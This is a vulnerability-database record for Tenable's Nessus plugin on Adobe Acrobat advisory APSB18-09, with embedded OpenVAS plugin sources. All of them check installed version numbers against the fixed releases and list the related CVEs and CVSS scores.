ID ADOBE_ACROBAT_APSB18-09.NASL Type nessus Reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2021-01-02T00:00:00
Description
The version of Adobe Acrobat installed on the remote Windows host is a
version prior to 2015.006.30418, 2017.011.30080,
or 2018.011.20040. It is, therefore, affected by multiple
vulnerabilities.
Note that Nessus has not tested for these issues but has instead
relied only on the application's self-reported version number.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(109895);
script_version("1.9");
script_cvs_date("Date: 2019/04/08 10:48:58");
script_cve_id(
"CVE-2018-4947",
"CVE-2018-4948",
"CVE-2018-4949",
"CVE-2018-4950",
"CVE-2018-4951",
"CVE-2018-4952",
"CVE-2018-4953",
"CVE-2018-4954",
"CVE-2018-4955",
"CVE-2018-4956",
"CVE-2018-4957",
"CVE-2018-4958",
"CVE-2018-4959",
"CVE-2018-4960",
"CVE-2018-4961",
"CVE-2018-4962",
"CVE-2018-4963",
"CVE-2018-4964",
"CVE-2018-4965",
"CVE-2018-4966",
"CVE-2018-4967",
"CVE-2018-4968",
"CVE-2018-4969",
"CVE-2018-4970",
"CVE-2018-4971",
"CVE-2018-4972",
"CVE-2018-4973",
"CVE-2018-4974",
"CVE-2018-4975",
"CVE-2018-4976",
"CVE-2018-4977",
"CVE-2018-4978",
"CVE-2018-4979",
"CVE-2018-4980",
"CVE-2018-4981",
"CVE-2018-4982",
"CVE-2018-4983",
"CVE-2018-4984",
"CVE-2018-4985",
"CVE-2018-4986",
"CVE-2018-4987",
"CVE-2018-4988",
"CVE-2018-4989",
"CVE-2018-4990",
"CVE-2018-4993",
"CVE-2018-4995",
"CVE-2018-4996",
"CVE-2018-12812",
"CVE-2018-12815"
);
script_bugtraq_id(
104102,
104167,
104168,
104169,
104171,
104172,
104173,
104174,
104175,
104176,
104177
);
script_name(english:"Adobe Acrobat < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09)");
script_summary(english:"Checks the version of Adobe Acrobat.");
script_set_attribute(attribute:"synopsis", value:
"The version of Adobe Acrobat installed on the remote Windows host is
affected by multiple vulnerabilities.");
script_set_attribute(attribute:"description", value:
"The version of Adobe Acrobat installed on the remote Windows host is a
version prior to 2015.006.30418, 2017.011.30080,
or 2018.011.20040. It is, therefore, affected by multiple
vulnerabilities.
Note that Nessus has not tested for these issues but has instead
relied only on the application's self-reported version number.");
script_set_attribute(attribute:"see_also", value:"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html");
script_set_attribute(attribute:"solution", value:
"Upgrade to Adobe Acrobat 2015.006.30418 / 2017.011.30080
/ 2018.011.20040 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-4947");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"exploited_by_malware", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2018/05/14");
script_set_attribute(attribute:"patch_publication_date", value:"2018/05/14");
script_set_attribute(attribute:"plugin_publication_date", value:"2018/05/17");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"cpe:/a:adobe:acrobat");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"Windows");
script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("adobe_acrobat_installed.nasl");
script_require_keys("SMB/Registry/Enumerated", "installed_sw/Adobe Acrobat");
exit(0);
}
include("vcf.inc");
include("vcf_extras.inc");
get_kb_item_or_exit("SMB/Registry/Enumerated");
app_info = vcf::get_app_info(app:"Adobe Acrobat", win_local:TRUE);
constraints = [
{ "min_version" : "15.6", "max_version" : "15.6.30417", "fixed_version" : "15.6.30418" },
{ "min_version" : "17.8", "max_version" : "17.11.30079", "fixed_version" : "17.11.30080" },
{ "min_version" : "15.7", "max_version" : "18.11.20038", "fixed_version" : "18.11.20040" }
];
# using adobe_reader namespace check_version_and_report to properly detect Continuous vs Classic,
# and limit ver segments to 3 (18.x.y vs 18.x.y.12345) with max_segs:3
vcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);
{"id": "ADOBE_ACROBAT_APSB18-09.NASL", "bulletinFamily": "scanner", "title": "Adobe Acrobat < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09)", "description": "The version of Adobe Acrobat installed on the remote Windows host is a\nversion prior to 2015.006.30418, 2017.011.30080,\nor 2018.011.20040. It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "published": "2018-05-17T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/109895", "reporter": "This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://helpx.adobe.com/security/products/acrobat/apsb18-09.html"], "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "type": "nessus", "lastseen": "2021-01-01T01:13:19", "edition": 30, "viewCount": 48, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310813239", "OPENVAS:1361412562310813230", "OPENVAS:1361412562310813233", "OPENVAS:1361412562310813240", "OPENVAS:1361412562310813238", "OPENVAS:1361412562310813232", "OPENVAS:1361412562310813241", "OPENVAS:1361412562310813231"]}, {"type": "kaspersky", "idList": ["KLA11252"]}, {"type": "nessus", "idList": ["ADOBE_READER_APSB18-09.NASL", "MACOSX_ADOBE_ACROBAT_APSB18-09.NASL", "MACOSX_ADOBE_READER_APSB18-09.NASL"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:52B0618B9393F16E911AB8A5CC487A7C"]}, {"type": "cve", "idList": ["CVE-2018-4968", "CVE-2018-4981", "CVE-2018-4973", "CVE-2018-4958", "CVE-2018-4984", "CVE-2018-4970", "CVE-2018-4976", "CVE-2018-12812", "CVE-2018-4961", "CVE-2018-4972"]}, {"type": "attackerkb", "idList": ["AKB:F655D7DB-2168-466C-BE67-0F0908306BE4"]}, {"type": "seebug", "idList": ["SSV:97293", "SSV:97294"]}, {"type": "talosblog", "idList": ["TALOSBLOG:C087C65FAEEB57D382F9DD6FD51D549C", "TALOSBLOG:E89C3607ED6143C88E65B06729E1F294"]}, {"type": "myhack58", "idList": ["MYHACK58:62201890341"]}, {"type": "talos", "idList": ["TALOS-2018-0517", "TALOS-2018-0592", "TALOS-2018-0569", "TALOS-2018-0518"]}, {"type": "zdi", "idList": ["ZDI-18-438", "ZDI-18-452", "ZDI-18-598", "ZDI-18-465", "ZDI-18-457", "ZDI-18-437", "ZDI-18-460", "ZDI-18-451", "ZDI-18-456", "ZDI-18-454"]}], "modified": "2021-01-01T01:13:19", "rev": 2}, "score": {"value": 8.9, "vector": "NONE", "modified": "2021-01-01T01:13:19", "rev": 2}, "vulnersScore": 8.9}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109895);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/04/08 10:48:58\");\n\n script_cve_id(\n \"CVE-2018-4947\",\n \"CVE-2018-4948\",\n \"CVE-2018-4949\",\n \"CVE-2018-4950\",\n \"CVE-2018-4951\",\n \"CVE-2018-4952\",\n \"CVE-2018-4953\",\n \"CVE-2018-4954\",\n \"CVE-2018-4955\",\n \"CVE-2018-4956\",\n \"CVE-2018-4957\",\n \"CVE-2018-4958\",\n \"CVE-2018-4959\",\n \"CVE-2018-4960\",\n \"CVE-2018-4961\",\n \"CVE-2018-4962\",\n \"CVE-2018-4963\",\n \"CVE-2018-4964\",\n \"CVE-2018-4965\",\n \"CVE-2018-4966\",\n \"CVE-2018-4967\",\n \"CVE-2018-4968\",\n \"CVE-2018-4969\",\n \"CVE-2018-4970\",\n \"CVE-2018-4971\",\n \"CVE-2018-4972\",\n \"CVE-2018-4973\",\n \"CVE-2018-4974\",\n \"CVE-2018-4975\",\n \"CVE-2018-4976\",\n \"CVE-2018-4977\",\n \"CVE-2018-4978\",\n \"CVE-2018-4979\",\n \"CVE-2018-4980\",\n \"CVE-2018-4981\",\n \"CVE-2018-4982\",\n \"CVE-2018-4983\",\n \"CVE-2018-4984\",\n \"CVE-2018-4985\",\n \"CVE-2018-4986\",\n \"CVE-2018-4987\",\n \"CVE-2018-4988\",\n \"CVE-2018-4989\",\n \"CVE-2018-4990\",\n \"CVE-2018-4993\",\n \"CVE-2018-4995\",\n \"CVE-2018-4996\",\n \"CVE-2018-12812\",\n \"CVE-2018-12815\"\n );\n script_bugtraq_id(\n 104102,\n 104167,\n 104168,\n 104169,\n 104171,\n 104172,\n 104173,\n 104174,\n 104175,\n 104176,\n 104177\n );\n\n script_name(english:\"Adobe Acrobat < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09)\");\n script_summary(english:\"Checks the version of Adobe Acrobat.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Acrobat installed on the remote Windows host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Acrobat installed on the remote Windows host is a\nversion prior to 2015.006.30418, 2017.011.30080,\nor 2018.011.20040. It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Acrobat 2015.006.30418 / 2017.011.30080\n/ 2018.011.20040 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4947\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_acrobat_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/Adobe Acrobat\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::get_app_info(app:\"Adobe Acrobat\", win_local:TRUE);\nconstraints = [\n { \"min_version\" : \"15.6\", \"max_version\" : \"15.6.30417\", \"fixed_version\" : \"15.6.30418\" },\n { \"min_version\" : \"17.8\", \"max_version\" : \"17.11.30079\", \"fixed_version\" : \"17.11.30080\" },\n { \"min_version\" : \"15.7\", \"max_version\" : \"18.11.20038\", \"fixed_version\" : \"18.11.20040\" }\n];\n# using adobe_reader namespace check_version_and_report to properly detect Continuous vs Classic, \n# and limit ver segments to 3 (18.x.y vs 18.x.y.12345) with max_segs:3\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "naslFamily": "Windows", "pluginID": "109895", "cpe": ["cpe:/a:adobe:acrobat"], "scheme": null, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}}
{"openvas": [{"lastseen": "2019-07-17T14:17:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "This host is installed with Adobe Acrobat 2017\n and is prone to multiple vulnerabilities.", "modified": "2019-07-16T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813230", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813230", "type": "openvas", "title": "Adobe Acrobat 2017 Security Updates(apsb18-09)-Windows", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Acrobat 2017 Security Updates(apsb18-09)-Windows\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813230\");\n script_version(\"2019-07-16T10:51:36+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4996\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", \"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", \"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-16 10:51:36 +0000 (Tue, 16 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:36 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Acrobat 2017 Security Updates(apsb18-09)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat 2017\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat 2017 before 2017.011.30080 on\n MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat 2017 version\n 2017.011.30080 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Acrobat/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_in_range(version:vers, test_version:\"17.0\", test_version2:\"17.011.30079\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"17.011.30080 (2017.011.30080)\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:18:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "This host is installed with Adobe Acrobat DC\n (Classic Track) and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813239", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813239", "type": "openvas", "title": "Adobe Acrobat DC (Classic Track) Security Updates (apsb18-09) - Mac OS X", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Acrobat DC (Classic Track) Security Updates (apsb18-09)-MAC OS X\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_dc_classic\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813239\");\n script_version(\"2019-07-05T08:21:18+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4996\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", \"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", \"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:21:18 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:55 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Acrobat DC (Classic Track) Security Updates (apsb18-09) - Mac OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat DC\n (Classic Track) and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat DC (Classic Track)\n 2015.006.30418 and earlier versions on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat DC (Classic Track)\n version 2015.006.30418 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_acrobat_dc_classic_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/AcrobatDC/Classic/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:vers, test_version:\"15.006.30418\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"15.006.30418 (2015.006.30418)\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:18:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "This host is installed with Adobe Reader 2017\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813231", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813231", "type": "openvas", "title": "Adobe Reader 2017 Security Updates(apsb18-09)-Windows", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Reader 2107 Security Updates(apsb18-09)-Windows\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813231\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4996\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", 